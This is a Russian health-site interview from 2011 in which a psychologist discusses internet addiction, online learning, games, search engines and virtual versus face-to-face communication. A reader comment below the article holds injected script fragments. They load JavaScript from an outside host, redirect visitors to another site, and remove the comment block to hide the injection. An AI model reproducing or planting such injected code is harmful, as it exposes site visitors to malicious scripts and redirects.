Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Я и моя виртуальная тень:...  >>  Я и моя виртуальная тень: как современные технологии изменили человека?
 
Обратная связь
 

Я и моя виртуальная тень: как современные технологии изменили человека?

Размер шрифта
23 августа 2011 07:01
  • google_analytics: false
  • Нравится

Лет 15 назад Интернет был в диковинку. А сегодня киберпространство определяет нашу жизнь и образ мышления. О людях нового поколения рассказывает Александр Войскунский, специалист по влиянию Интернета на психику человека.

1

Екатерина Олейникова / «Здоровье инфо»

В чем выражается интернет-зависимость?

Надо сказать, что в медицинских и психологических документах подобная зависимость еще не зафиксирована. Но описаний поведенческих характеристик интернет-зависимых людей уже уйма. Зависимый от Интернета человек проводит большую часть дня в Сети, недосыпает, плохо питается, отменяет важные встречи, забывает сходить в душ и почистить зубы. Самые яркие признаки интернет-зависимости – чувство вины, которое человек испытывает, обманывая, опаздывая, забывая, и эйфория при возвращении в Интернет. Точно так же чувствует себя любитель казино, сбегая от жизни к игорному столу.

Для разговора о последствиях такой зависимость прошло слишком мало времени. Ни один человек не прожил от юности в Интернете до глубокой старости. Предлагаю вернуться к этому вопросу лет через 35.

Эффективно ли образование в Интернете?

Это зависит от того, насколько сам человек готов учиться. Для масштабного образования в Интернете надо создавать другие учебники, мультимедийные хрестоматии, делать сеть ссылок от одного вида информации к другой.

Новая методика ставит новые задачи. Большой текст на экране читается по диагонали,  а значит, и учебник для Интернета надо составлять по-другому, писать короткие главки, с понятными заголовками, выводами.

Кстати, именно Интернет дает прекрасную возможность выполнить одну из основных задач традиционного образования – развитие критического мышления, которая базируется на умении защищать одну точку зрения и тут же – противоположную.

Интернет – это море информации в том числе и для тех, кто хочет знать больше, учить языки, следить за развитием науки. К примеру, лучший технический университет мира, Массачусетский технологический институт, выкладывает онлайн-лекции. Разве такое было возможно еще каких-то двадцать лет назад?

Как вы относитесь к онлайн играм?

Как к данности. Пытаться их отменить – все равно, что вводить в стране сухой закон. Сделаешь только хуже. Впрочем, противнии онлайн-игр тоже не всегда бывают правы. Многие компьютерные игры развивают полезные навыки и умения: ребенок быстрее распознает образы, учится мгновенно принимать решение, работать в команде, принимать на себя лидирующую роль. 

Игры

Как электронные энциклопедии и поисковики изменили психологию современного человека?

Энциклопедии и поисковики дарят уверенность, что ты нигде не окажешься без информационной помощи. В любую секунду можно обратиться с вопросом к Яндексу и получить ответ. Впрочем, современные поисковики далеки от идеала. Человеку тоже не хватает критического мышления, чтобы усомниться в прочитанном в Интернете и сверить эту информацию с другими источниками.

Нормальна ли ситуация, когда человек постоянно ставит себе напоминания на телефон, не надеясь на собственную память.

Что тут скажешь? У богатой знати всегда были секретари-референты, напоминавшие, когда и что нужно сделать. Мы же, люди попроще и победнее, тащим в своем сознании и хозяина, и слугу. Пользуясь такими напоминаниями, вы сохраняете ресурсы памяти для концептуальных знаний и обдумывания всего, что для вас важно.

Правда ли, что психические болезни и отклонения стали распространяться гораздо быстрее с появлением Интернета?

Таких данных нет. Зато есть другая опасность: информация об отклонениях слишком быстро распространяется по Сети. Например, есть закрытые группы, в которых общаются люди, готовые расстаться с жизнью. И бывает, что желающие совершить суицид сговариваются по Интернету, чтобы вдвоем-втроем в одно и то же время в разных местах покончить собой. Насколько мне известно, в Израиле есть волонтерская служба, члены которой находят таких людей, пытаются достучаться, переубедить и спасти жизнь.

1

Деградирует ли человек с развитием современных технологий?

Наоборот, технологии способствуют развитию если не мозга напрямую, то точно – психических функций. Сегодня мы достигаем большего в короткие сроки. Для старшего поколения недоступны технологии, которыми пользуется молодежь: кредитные карты, системы интернет-контроля за детьми. Это говорит как раз о развитии человека, а не о его деградации.

Может ли общение в Интернете заменить живое общение?

Может. Но зачем? Обратите внимание, сколько издается пособий по совершенствованию так называемого живого общения. В социальной сети у человека другая задача: здесь важно не общение, а умение сделать самопрезентацию. Это другой способ взаимодействовать с интересными людьми. До живого общения с ними может дело не дойти. Но если вы стремитесь понимать своего партнера без слов, тогда вам точно не в Интернет. Отсутствие социальной перцепции в Интернете – вот с чем, на мой взгляд, связано такое количество неудач в знакомствах и общении через Интернет. Так что надеюсь, что чья-то мечта о замене живого общения на виртуальное не сбудется никогда.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как социальные сети разрушают ваши отношения   Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!   1 зашел – 1 вышел! Как «дружат» люди в социальных сетях   Нужны ли бабушке социальные сети? Оказывается, они улучшат ее умственные способности!  
28 июля 2011Социальные сети помогают справиться с катастрофами 06 июля 2012Оказывается, сплетни полезны для здоровья!
 
30 апреля 2013Нужны ли бабушке социальные сети? Оказывается, они улучшат ее умственные способности! 01 февраля 2013Диагноз «шизофрения» можно поставить по движению глаз
 

Слайдшоу

1
Вся правда о депрессии Что делать, чтобы новогодние желания сбылись
Что вы знаете о шизофрении? Супереда против стресса
Продукты-антидепрессанты Вспомнить все. Часть 1
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.